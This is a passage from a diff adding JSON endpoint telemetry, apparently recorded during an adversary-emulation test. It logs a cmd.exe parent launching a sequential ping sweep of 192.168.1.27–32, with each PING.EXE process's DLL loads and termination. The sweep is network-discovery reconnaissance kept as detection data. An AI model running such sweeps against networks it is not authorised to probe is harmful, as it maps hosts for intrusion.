"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572111990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "event_type": "process", + "pid": 6840, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572116990000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-001091B25101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.27", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2812, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572117140000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "event_type": "process", + "pid": 2812, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572121840000, + "unique_pid": "{42FC7E13-CB5B-5C05-0000-00100CB55101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.28", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2416, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572121990000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572121980000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "event_type": "process", + "pid": 2416, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572126990000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-00107EB75101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.29", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6660, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127140000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127300000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127300000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572127300000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "event_type": "process", + "pid": 6660, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572131990000, + "unique_pid": "{42FC7E13-CB5C-5C05-0000-0010FEB95101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.30", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6172, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572132140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "event_type": "process", + "pid": 6172, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572136830000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-001071BC5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.31", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3476, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572136980000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572136990000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572137140000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "event_type": "process", + "pid": 3476, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572141840000, + "unique_pid": "{42FC7E13-CB5D-5C05-0000-0010EBBE5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.32", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6672, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-001059C15101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6672, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572141990000, + "unique_pid": 